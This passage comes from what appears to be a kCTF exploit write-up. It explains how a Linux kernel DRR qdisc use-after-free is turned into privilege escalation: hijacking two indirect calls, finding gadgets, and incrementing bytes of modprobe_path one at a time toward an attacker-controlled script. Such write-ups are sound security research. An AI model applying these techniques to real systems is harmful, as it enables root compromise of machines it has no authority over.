class, so this will write to our <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> refill object. That is notable because that is an immutable refill object: once we refill (allocate it), we have no way of resetting or changing its contents. 
We then see a call to <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> at <code class="language-plaintext highlighter-rouge">[5]</code>, which we will get into in a second, and if that returns NULL, we can escape this hell-hole of a function at <code class="language-plaintext highlighter-rouge">[6]</code>. Separately, if we make it to <code class="language-plaintext highlighter-rouge">[7]</code>, which would incur several memory accesses to our fake qdisc, we return a non-NULL pointer value. My goal from the start was to restore execution as gracefully and simply as possible, which meant returning NULL from this function so that the calling function had nothing to do with the results of our hijacked execution. We can see even more list manipulation at <code class="language-plaintext highlighter-rouge">[8]</code>, so I wanted to avoid this at all costs.</p>

<p>Let’s then go check on the call to <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> which takes a pointer to our fake qdisc as its argument in <code class="language-plaintext highlighter-rouge">[5]</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* use instead of qdisc-&gt;dequeue() for all qdiscs queried with -&gt;peek() */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">qdisc_dequeue_peeked</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="n">skb_peek</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">gso_skb</span><span class="p">);</span>			<span class="c1">// [1]</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>							<span class="c1">// [2]</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">__skb_dequeue</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">gso_skb</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">qdisc_is_percpu_stats</span><span class="p">(</span><span class="n">sch</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">qdisc_qstats_cpu_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_cpu_qlen_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">dequeue</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>				<span class="c1">// [3]</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We see that we get a pointer to another <code class="language-plaintext highlighter-rouge">sk_buff</code> by calling <code class="language-plaintext highlighter-rouge">skb_peek()</code> on the <code class="language-plaintext highlighter-rouge">gso_skb</code> field of our fake qdisc. This is good news for us, because it means this outcome is <em>probably somewhat</em> controllable since we control the entirety of the fake qdisc. We’ll examine <code class="language-plaintext highlighter-rouge">skb_peek()</code> in a second. If <code class="language-plaintext highlighter-rouge">skb_peek()</code> returns a non-NULL socket buffer, we then go on to call <code class="language-plaintext highlighter-rouge">__skb_dequeue</code> with the pointer to <code class="language-plaintext highlighter-rouge">gso_skb</code>, which does more list manipulation and memory accesses on the fake qdisc. This looked very unattractive to me compared to yet another indirect function call in <code class="language-plaintext highlighter-rouge">sch-&gt;dequeue(sch)</code>, which we should again be able to hijack because we control the fake qdisc. So at this point I’m thinking:</p>
<ol>
  <li>We hijack execution in two places: once in <code class="language-plaintext highlighter-rouge">drr_dequeue</code> and once in <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code></li>
  <li>We can use the first hijacking to do <em>something useful</em></li>
  <li>We can use the second hijacking to restore execution in some way gracefully</li>
</ol>

<p>So the first thing I tried was killing my task in the first hijacking spot just to make sure it was possible to do. I tried a few tricks that other players have used and ended up trying to use <a href="https://elixir.bootlin.com/linux/v5.15.173/source/kernel/exit.c#L776"><code class="language-plaintext highlighter-rouge">do_exit</code></a> as the way to kill my task, which is whatever task I use to send a packet to the loopback interface and trigger the call to <code class="language-plaintext highlighter-rouge">drr_dequeue</code>. The problem is that I hit this code block:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">in_interrupt</span><span class="p">()))</span>
		<span class="n">panic</span><span class="p">(</span><span class="s">"Aiee, killing interrupt handler!"</span><span class="p">);</span>
</code></pre></div></div>

<p>This means that we hijack execution in an interrupt context, likely from the interrupt caused by the loopback interface receiving a packet. So the tricks that typically apply to a normal process context don’t apply here, and I don’t have powerful enough primitives (we’re just limited to two function calls, not a full ROP chain) to remove my task from an interrupt context. So my plan was to just exit the dequeue function normally by returning NULL if possible.</p>

<p>To see if this is feasible, we need to see where and how we can reach the <code class="language-plaintext highlighter-rouge">sch-&gt;dequeue</code> inside of <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> which is our 2nd hijack spot. We need <code class="language-plaintext highlighter-rouge">skb_peek(&amp;sch-&gt;gso_skb)</code> to return NULL:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">skb_peek</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sk_buff_head</span> <span class="o">*</span><span class="n">list_</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="n">list_</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">)</span><span class="n">list_</span><span class="p">)</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Turns out this is just a simple check to see if a list head element points to itself, indicating that the list is empty. We can actually do this because we control the fake qdisc. So as long as the value at the offset of <code class="language-plaintext highlighter-rouge">&amp;sch-&gt;gso_skb</code> points to its own address, this function returns NULL. That lands us right in <code class="language-plaintext highlighter-rouge">sch-&gt;dequeue</code>, our 2nd hijack spot. Our goal is to have <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> return NULL, so we need this arbitrary function call to return NULL or 0. So now we need two gadgets or function calls:</p>
<ol>
  <li>A function call that does something <em>useful</em> with our control over <code class="language-plaintext highlighter-rouge">rdi</code></li>
  <li>A function call that simply returns NULL or 0 to restore execution gracefully within <code class="language-plaintext highlighter-rouge">drr_dequeue</code></li>
</ol>
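<p>The control flow described above can be sketched as a small userland mock. Everything here is a simplified stand-in: the <code class="language-plaintext highlighter-rouge">mock_*</code> types do not match the real kernel layouts, the two gadget functions are placeholders, and only a single pass of the loop is modeled. It just shows that a self-pointing <code class="language-plaintext highlighter-rouge">gso_skb</code> routes execution from the first indirect call to the second and then out with NULL.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-ins for the kernel types. Layouts are NOT the real ones. */
struct mock_list_head {
	struct mock_list_head *next, *prev;
};

struct mock_qdisc;

struct mock_ops {
	void *(*peek)(struct mock_qdisc *q);	/* first hijack spot */
};

struct mock_qdisc {
	void *(*dequeue)(struct mock_qdisc *q);	/* second hijack spot */
	const struct mock_ops *ops;
	struct mock_list_head gso_skb;
};

struct mock_class {
	struct mock_qdisc *qdisc;
	uint32_t deficit;
};

int useful_calls, null_calls;

/* Placeholder for the "do something useful" gadget; returns non-NULL. */
void *useful_gadget(struct mock_qdisc *q)
{
	useful_calls++;
	return q;
}

/* Placeholder for the "return NULL" gadget. */
void *return_null_gadget(struct mock_qdisc *q)
{
	(void)q;
	null_calls++;
	return NULL;
}

/* Same emptiness test as skb_peek(): a head pointing at itself is empty. */
void *mock_skb_peek(struct mock_list_head *head)
{
	return head->next == head ? NULL : (void *)head->next;
}

void *mock_dequeue_peeked(struct mock_qdisc *q)
{
	void *skb = mock_skb_peek(&q->gso_skb);

	if (skb)
		return skb;	/* the list-manipulation path we want to avoid */
	return q->dequeue(q);
}

/* One pass through drr_dequeue. The real function loops when
 * len > deficit; this mock simply gives up and returns NULL. */
void *mock_drr_dequeue(struct mock_class *cl, uint32_t len)
{
	void *skb = cl->qdisc->ops->peek(cl->qdisc);

	if (skb == NULL || len > cl->deficit)
		return NULL;
	cl->deficit -= len;
	return mock_dequeue_peeked(cl->qdisc);
}

/* Build a fake qdisc with a self-pointing gso_skb and run one pass. */
void *run_one_pass(void)
{
	static const struct mock_ops ops = { .peek = useful_gadget };
	struct mock_qdisc q = { .dequeue = return_null_gadget, .ops = &ops };
	struct mock_class cl = { .qdisc = &q, .deficit = 0xffffffff };

	q.gso_skb.next = q.gso_skb.prev = &q.gso_skb;
	return mock_drr_dequeue(&cl, 1);
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">run_one_pass()</code> invokes each placeholder gadget exactly once and returns NULL, which is the shape we want from the real thing.</p>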

<h2 id="gadget-hunting">Gadget Hunting</h2>
<p>I assumed finding the 2nd gadget would be easy, a function call that simply returns 0 or NULL; however, it still took me some time to find. The first thought I had was let’s just find a function like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">u64</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">return</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">field</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This would be easy: we control the entirety of the memory pointed to by <code class="language-plaintext highlighter-rouge">struct foo *</code>, so we could simply read a field that contains 0. But then I remembered that I can’t really have NULL bytes in my <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> because it’s interpreted as a path name when it’s sent. So I skipped this idea. What would be even better is a function like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">u64</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">return</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">field</span><span class="o">-&gt;</span><span class="n">val</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This would be perfect, we could just have field point to something that is guaranteed to be 0, such as the end of our <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> where a NULL value is no issue. I found just that in this function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span>
<span class="nf">sch_frag_dst_get_mtu</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">dst_entry</span> <span class="o">*</span><span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="n">dst</span><span class="o">-&gt;</span><span class="n">dev</span><span class="o">-&gt;</span><span class="n">mtu</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
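<p>As a rough illustration of why the extra dereference helps, here is a userland sketch, assuming a buffer whose tail is never written and therefore stays zeroed. The <code class="language-plaintext highlighter-rouge">mock_*</code> structures and the field offsets are made up for the example; the real <code class="language-plaintext highlighter-rouge">dst_entry</code> and <code class="language-plaintext highlighter-rouge">net_device</code> are much larger.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-ins; the real structures are far larger. */
struct mock_net_device {
	uint8_t pad[16];
	unsigned int mtu;
};

struct mock_dst_entry {
	struct mock_net_device *dev;
};

/* Stand-in for the path buffer: payload up front, zeroes at the end. */
struct mock_buf {
	struct mock_dst_entry fake_dst;		/* what rdi would point at */
	uint8_t payload[256];			/* non-zero exploit data */
	struct mock_net_device zero_tail;	/* never written, stays zero */
};

/* Same shape as sch_frag_dst_get_mtu(): follow a pointer, read a field. */
unsigned int mock_dst_get_mtu(const struct mock_dst_entry *dst)
{
	return dst->dev->mtu;
}

/* Fill the payload with non-zero bytes and aim dev at the zeroed tail. */
void stage_fake_dst(struct mock_buf *buf)
{
	assert(buf != NULL);
	memset(buf, 0, sizeof(*buf));
	memset(buf->payload, 0x41, sizeof(buf->payload));
	buf->fake_dst.dev = &buf->zero_tail;
}
```

<p>The zero never has to appear in the staged data itself; only the pointer to it does, and in the real buffer that pointer still has to be free of NULL bytes.</p>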

<p>So now we have our “return NULL gadget” and it was time to find our “do something useful gadget”. I played around with the idea for a long time of using this first hijack spot to perform an arbitrary free to upgrade our limited class UAF to something more useful, a more generalized UAF. I would need something like this probably:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ptr</span><span class="p">);</span>
	<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I quickly abandoned this idea though, because I didn’t have a leaked heap pointer to point the <code class="language-plaintext highlighter-rouge">kfree</code> at, and I didn’t want to resort to using leaked pointers from our <code class="language-plaintext highlighter-rouge">WARN()</code> splat because it felt like cheating. So then I became determined to find an arbitrary write gadget. With the arbitrary write gadget, I would be able to overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> to point to a file I control and read the flag from the container host. This has been done in numerous ways in the kCTF program, so I knew it was feasible. Now began the hard work of finding a write gadget.</p>

<h2 id="finding-an-arbitrary-write-function">Finding an Arbitrary Write Function</h2>
<p>Finding the write function took me a very long time. I was looking for a function that took a single pointer argument and derived a write from its contents, something like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">u64</span> <span class="o">*</span><span class="n">location</span> <span class="o">=</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">field</span><span class="p">;</span>
	<span class="o">*</span><span class="n">location</span> <span class="o">=</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">value</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This would derive both the “what” and the “where” in the write from <code class="language-plaintext highlighter-rouge">rdi</code>, which we control as our fake qdisc. To start searching, I just started thinking about what data structures in the kernel are humongous and often self-contained logic-wise, i.e., likely to be passed to a function by themselves. I narrowed my search down to the following structure types: socket buffers, files, directory entries, inodes, and a few others. Cycling through these subsystems and grepping for patterns, I eventually found this function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">clear_nlink</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_nlink</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">inode</span><span class="o">-&gt;</span><span class="n">__i_nlink</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">atomic_long_inc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_sb</span><span class="o">-&gt;</span><span class="n">s_remove_count</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This fits our needs perfectly: if a field in the passed-in <code class="language-plaintext highlighter-rouge">inode</code> is non-zero, which we prefer, then it increments the value at <code class="language-plaintext highlighter-rouge">inode-&gt;i_sb-&gt;s_remove_count</code> as if it’s a u64 value. An increment is a type of limited write primitive: we’re able to target a single byte at a time, increment it until it reaches a desired value, and then move on to the next byte. So my goal became:</p>
<ol>
  <li>Use the increment primitive to increment the first character of <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> in kernel memory</li>
  <li>Use the return NULL hijack to exit gracefully from <code class="language-plaintext highlighter-rouge">drr_dequeue</code></li>
  <li>Send another packet to repeat until <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> is overwritten to something we control</li>
</ol>

<p>One iteration of this worked perfectly, and I was able to check after the iteration and see that <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> had become <code class="language-plaintext highlighter-rouge">0sbin/modprobe</code> in memory. So the concept worked, but now we have other problems: we need to execute this code path many times because we need to do a lot of incrementing. We want <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> to become something like <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>, where pid 500 is a pid of ours and fd 3 is a privilege escalation script that gets executed when the kernel tries to invoke the <code class="language-plaintext highlighter-rouge">modprobe_path</code>.</p>
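<p>To get a feel for how much incrementing that is, here is a hedged userland model of the primitive. It assumes each firing is a 64-bit little-endian increment at the targeted byte address, so a byte that wraps past <code class="language-plaintext highlighter-rouge">0xff</code> carries into the next byte; walking the string left to right keeps already-finished bytes untouched. The function names and the 256-byte buffer size are assumptions for the sketch, not code from the exploit.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PATH_BUF_LEN 256	/* assumed size of the modprobe_path array */

/* Model one firing of the primitive: a 64-bit little-endian
 * increment of the value starting at buf + off. */
void inc64_at(uint8_t *buf, size_t off)
{
	assert(off + 8 <= PATH_BUF_LEN);
	for (size_t i = 0; i < 8; i++)
		if (++buf[off + i] != 0)
			break;	/* no carry into the next byte */
}

/* Rewrite the string in buf into target, one increment at a time,
 * fixing bytes from the lowest address upward. Returns the total
 * number of increments (i.e. packets) that were needed. */
size_t rewrite_by_increments(uint8_t *buf, const char *target)
{
	size_t n = strlen(target) + 1;	/* include the terminating NUL */
	size_t total = 0;

	for (size_t i = 0; i < n; i++) {
		while (buf[i] != (uint8_t)target[i]) {
			inc64_at(buf, i);
			total++;
		}
	}
	return total;
}
```

<p>Running <code class="language-plaintext highlighter-rouge">rewrite_by_increments()</code> on a buffer holding <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> with a target of <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code> gives the number of trips through the hijacked path under this model. Bytes past the terminator may be disturbed by carries, which is harmless as long as they stay inside the array.</p>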

<p>So let’s revisit <code class="language-plaintext highlighter-rouge">drr_dequeue</code> and identify the spots that cause problems:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">drr_dequeue</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">))</span>
		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">cl</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">,</span> <span class="k">struct</span> <span class="n">drr_class</span><span class="p">,</span> <span class="n">alist</span><span class="p">);</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">peek</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>				
		<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">qdisc_warn_nonwc</span><span class="p">(</span><span class="n">__func__</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>					<span class="c1">// [1]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&lt;=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span><span class="p">)</span> <span class="p">{</span>					<span class="c1">// [2]</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>					<span class="c1">// [3]</span>
			<span class="n">skb</span> <span class="o">=</span> <span class="n">qdisc_dequeue_peeked</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>			
			<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">))</span>
				<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>					
			<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>

			<span class="n">bstats_update</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">bstats</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_bstats_update</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
			<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>						
		<span class="p">}</span>

		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">+=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
		<span class="n">list_move_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>				
	<span class="p">}</span>
<span class="nl">out:</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To execute this code path over and over, we need to make sure we <em>always</em> enter the if statement body. So we always need <code class="language-plaintext highlighter-rouge">len &lt;= cl-&gt;deficit</code> to be true. Remember that <code class="language-plaintext highlighter-rouge">len</code> is derived from reading a value at some offset in the kernel text next to our arbitrary write gadget address, so we have zero control over the value that is returned. But we do control <code class="language-plaintext highlighter-rouge">cl-&gt;deficit</code> with our <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code>, so we can make sure that is always <code class="language-plaintext highlighter-rouge">0xffffffff</code>. Awesome, we’re good to go? Nope. At <code class="language-plaintext highlighter-rouge">[3]</code> that value is decremented in place by <code class="language-plaintext highlighter-rouge">len</code>, so that memory is accessed and written to. This is a big problem for me: <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> is immutable, so I have no way of updating that value to reset it.</p>
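<p>To make the problem concrete, here is a small userspace model of the check at <code class="language-plaintext highlighter-rouge">[2]</code> and the write at <code class="language-plaintext highlighter-rouge">[3]</code>. It is only a sketch: <code class="language-plaintext highlighter-rouge">struct fake_class</code>, <code class="language-plaintext highlighter-rouge">try_dequeue</code> and <code class="language-plaintext highlighter-rouge">count_passes</code> are hypothetical names, and the <code class="language-plaintext highlighter-rouge">len</code> you pass in is made up, since the real value comes from kernel text we don’t control.</p>

```c
#include <stdint.h>

/* Hypothetical stand-in for the two drr_class fields that matter here. */
struct fake_class {
    uint32_t deficit;
    uint32_t quantum;
};

/* Models the check at [2] and the in-place write at [3].
 * Returns 1 if the packet would be dequeued, 0 otherwise. */
static int try_dequeue(struct fake_class *cl, uint32_t len) {
    if (len <= cl->deficit) {
        cl->deficit -= len;       /* the write we cannot undo with udata */
        return 1;
    }
    cl->deficit += cl->quantum;   /* fall-through path from the listing */
    return 0;
}

/* Counts how many consecutive rounds take the dequeue branch.
 * reset_each_round models having mutable backing memory (1) versus
 * memory we can only set once (0). quantum is 0 purely for illustration. */
static unsigned count_passes(uint32_t len, unsigned rounds, int reset_each_round) {
    struct fake_class cl = { .deficit = 0xffffffffu, .quantum = 0 };
    unsigned ok = 0;

    for (unsigned i = 0; i < rounds; i++) {
        if (reset_each_round)
            cl.deficit = 0xffffffffu;
        if (!try_dequeue(&cl, len))
            break;
        ok++;
    }
    return ok;
}
```

<p>With a large enough made-up <code class="language-plaintext highlighter-rouge">len</code>, the no-reset case stops taking the branch after a handful of rounds, while the reset case keeps going for as many rounds as requested. That is the whole reason the backing memory has to be writable.</p>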

<p>At this point, I realized I’d have to completely redo my strategy for refilling the UAF class. I should’ve done this from the beginning but I was so stupidly attached to this idea of using <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> because I had discovered it independently a couple years ago and had some weird sense of pride in being able to finally use it. I decided to get the entire victim class object page sent back to the page allocator and reclaim the page with a pipe buffer page backing as I had done previously in my <a href="https://h0mbre.github.io/kCTF_Data_Only_Exploit/">last kCTF exploit</a>. This would give me mutable memory that I could reset every iteration.</p>

<p>But there was also another detail in the path in our write gadget:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">clear_nlink</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_nlink</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">inode</span><span class="o">-&gt;</span><span class="n">__i_nlink</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">atomic_long_inc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_sb</span><span class="o">-&gt;</span><span class="n">s_remove_count</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This gadget NULLs out the value at <code class="language-plaintext highlighter-rouge">inode-&gt;__i_nlink</code> and we require that value to be non-NULL in order to do the increment. So this would have to be reset as well. On top of that, we also need to slide the write-target as we successfully increment each character of <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> until it’s <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>. So we’ll need to reset the <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> memory each iteration as well, which is not as big of a deal since that is easily doable with <code class="language-plaintext highlighter-rouge">iptables</code>.</p>

<p>So now the exploit plan was clear:</p>
<ol>
  <li>Increment a single byte of the <code class="language-plaintext highlighter-rouge">modprobe_path</code> string</li>
  <li>Reset the page backing of all of the pipes we have allocated pages for (one of them has reclaimed our freed page containing the victim UAF class) so that we can update <code class="language-plaintext highlighter-rouge">cl-&gt;deficit</code> to <code class="language-plaintext highlighter-rouge">0xffffffff</code></li>
  <li>Reset the <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> contents to give <code class="language-plaintext highlighter-rouge">inode-&gt;i_nlink</code> a non-NULL value</li>
  <li>Possibly reset the target pointed to by <code class="language-plaintext highlighter-rouge">s_remove_count</code> if we have incremented the current character enough in the <code class="language-plaintext highlighter-rouge">modprobe_path</code> string</li>
  <li>Repeat until finished</li>
</ol>

<h2 id="putting-it-all-together">Putting It All Together</h2>
